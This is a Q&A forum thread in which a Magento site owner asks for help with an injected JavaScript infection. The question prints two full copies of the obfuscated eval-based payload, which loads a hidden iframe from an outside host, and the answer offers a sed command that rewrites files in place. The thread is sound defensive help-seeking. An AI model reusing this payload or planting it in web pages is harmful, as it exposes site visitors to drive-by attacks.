# Magento Site Javascript "d0e3a6" Hack

Tags: javascript, magento, exploit

There was a post on here yesterday that was closed because the issue was too localised. Well, I'm now having the same issue and it seems like a pretty new problem.

Basically, my anti-virus is now blocking my site as of yesterday. The https:// version of the site is loading absolutely fine, but the normal http:// version is being blocked by the anti-virus.

So after digging around, I found that this code is on a various number of PHP pages across the site:

```
<script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["bod"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6d,6f,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6d,6f,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,65,58,5e,69,58,5d,60,5a,58,25,60,69,69,5c,5e,6c,63,58,69,25,60,6b,26,45,2a,39,3e,44,3d,51,61,25,67,5f,67,1e,32,4,1,17,6d,6f,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,6d,6f,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,6d,6f,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6d,6f,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,6d,6f,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6d,6f,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6d,6f,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,6d,6f,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6d,6f,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,6d,6f,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1317!=0;i+=1){j=i;if((0x19==031))if(e)s=s+ff(e(aq+(w[j]))+0xa-01);}za=e;za(s)}</script>
```

There is also this code being injected to all javascript files across the website:

```
/*d0e3a6*/ sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,65,58,5e,69,58,5d,60,5a,58,25,60,69,69,5c,5e,6c,63,58,69,25,60,6b,26,45,2a,39,3e,44,3d,51,61,25,67,5f,67,1e,32,4,1,17,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,5d,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,5d,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5d,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5d,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5d,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,5d,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5d,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1305!=0;i+=1){j=i;if((0x19==031))if(e)s=s+ff(e(aq+(w[j]))+0xa-01);}za=e;za(s)}  /*/d0e3a6*/
```

When I try and remove the code from all the files and re-upload them, a short amount of time later, the code is back.

Has anyone else seen something similar in Magento? Could it originate from the Wordpress CMS also installed? I'm really stumped at this point. It would be great if anyone has some decent removal instructions that isn't just "fresh install".

Answer (score 1):

More than likely it is from your WordPress installation - more likely to be a 3rd party plugin. I've seen WordPress 3rd party extensions act as a dropper and within minutes all your PHP files are infected again.

It's hard to write you instructions without seeing the site, but I was previously able to identify a pattern and have the exploit removed with something similar to:

```
sed -i '1s/<[^>]*>//' *
```

**Do not run this** though, it probably won't work for you and may break your site - like I say each case is different. Do your research first or hire someone to do it. Always backup before doing things like this.